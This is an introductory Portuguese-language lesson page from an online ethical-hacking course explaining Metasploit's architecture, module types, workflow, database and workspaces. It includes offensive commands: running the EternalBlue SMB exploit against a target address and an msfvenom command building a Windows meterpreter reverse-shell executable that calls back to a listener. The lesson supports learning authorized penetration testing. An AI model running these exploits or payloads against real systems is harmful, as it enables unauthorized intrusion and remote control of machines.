0Pricing
Ethical Hacking Academy · Aula

Arquitetura do Metasploit

Módulos e console

Arquitetura do Metasploit é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 1 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que é o Metasploit?

Metasploit é a estrutura de exploração mais utilizada. Ela fornece uma biblioteca estruturada de explorações, cargas úteis e ferramentas para testar e demonstrar vulnerabilidades durante trabalhos autorizados.

Em vez de escrever cada ataque do zero, o senhor carrega módulos comprovados, configura-os e os executa por meio de uma interface consistente.

msfconsole

A interface principal é o msfconsole, um shell interativo de linha de comandos. Ele oferece preenchimento automático por tabulação, histórico de comandos e acesso a todos os módulos.

O senhor o inicia em um terminal e então trabalha inteiramente dentro do seu prompt.

msfconsole
# msf6 > help

Tipos de módulos

O Metasploit organiza os recursos em tipos de módulos:

  • exploit: código que tira proveito de uma vulnerabilidade.
  • payload: código executado no alvo após a exploração.
  • auxiliary: scanners, fuzzers e ferramentas que não entregam uma carga útil.
  • post: ações de pós-exploração em um host comprometido.
  • encoder e nop: ajudam as cargas úteis a escapar da detecção.

Nomenclatura dos módulos

Os módulos usam um caminho hierárquico que informa exatamente o que fazem. Ler o caminho revela o tipo, a plataforma e o serviço-alvo.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Explorações versus cargas úteis

Uma distinção importante:

  • O exploit é o meio de entrada; ele compromete o software vulnerável.
  • A payload é o que o senhor deseja que aconteça depois de entrar, como abrir um shell.

O senhor os combina: uma exploração pode entregar muitas cargas úteis diferentes, dependendo do seu objetivo e do alvo.

O fluxo de trabalho dos módulos

O trabalho com qualquer módulo segue um ciclo repetível:

  • faça uma busca por um módulo.
  • use-o para carregá-lo.
  • defina opções como RHOSTS e LHOST.
  • execute-o ou faça a exploração.

Essa consistência explica por que a estrutura pode ser ampliada para milhares de módulos.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Armazenamento de dados e opções

As configurações dos módulos ficam no armazenamento de dados. Cada opção pode ser obrigatória ou opcional.

  • RHOSTS: endereço(s) do alvo remoto.
  • RPORT: porta remota.
  • LHOST: seu endereço de escuta para conexões reversas.
  • LPORT: sua porta de escuta.

Use show options para ver do que um módulo precisa antes de executá-lo.

O banco de dados

O Metasploit integra-se a um banco de dados PostgreSQL para armazenar hosts, serviços, espólios e credenciais descobertos durante um trabalho. Isso permite acompanhar um escopo amplo com eficiência.

Inicie-o antes de abrir o console para que os resultados sejam registrados automaticamente.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Módulos auxiliares

Os módulos auxiliary realizam tarefas úteis sem explorar vulnerabilidades: varredura de portas, enumeração de serviços, tentativa exaustiva de logins e fuzzing.

Frequentemente, eles são o primeiro passo, reunindo as informações necessárias antes da seleção de uma exploração.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom é uma ferramenta complementar para gerar cargas úteis autônomas como arquivos: executáveis, scripts ou shellcode que o senhor entrega fora do console.

Ela combina a geração e a codificação de cargas úteis em um único comando, sendo útil para simulações de phishing ou entrega personalizada em testes autorizados.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Espaços de trabalho

Para vários trabalhos, os espaços de trabalho do Metasploit mantêm isolados no banco de dados os hosts, serviços e espólios de cada cliente. O senhor alterna entre eles para que os dados nunca se misturem entre avaliações.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Verificação rápida

Teste sua compreensão dos tipos de módulos.

Recapitulação

O senhor aprendeu a arquitetura do Metasploit:

  • msfconsole é a interface principal; msfvenom cria cargas úteis autônomas.
  • Tipos de módulos: exploit, payload, auxiliary, post, encoder/nop.
  • Os caminhos dos módulos codificam tipo, plataforma e serviço.
  • Fluxo de trabalho: buscar, usar, definir opções e executar; as configurações ficam no armazenamento de dados.
  • O banco de dados PostgreSQL acompanha hosts, serviços e espólios.

A seguir: como buscar e usar explorações com eficiência.

Perguntas Frequentes

A aula “Arquitetura do Metasploit” é grátis?

Sim — o texto completo de “Arquitetura do Metasploit” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que vou aprender em “Arquitetura do Metasploit”?

Módulos e console Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Ethical Hacking Academy?

Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 1 de 4.

Quanto tempo leva a aula “Arquitetura do Metasploit”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Ethical Hacking Academy?

Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit
  2. Pesquisa e uso de exploits
  3. Cargas úteis e Meterpreter
  4. Módulos pós-exploração
← Voltar para Ethical Hacking Academy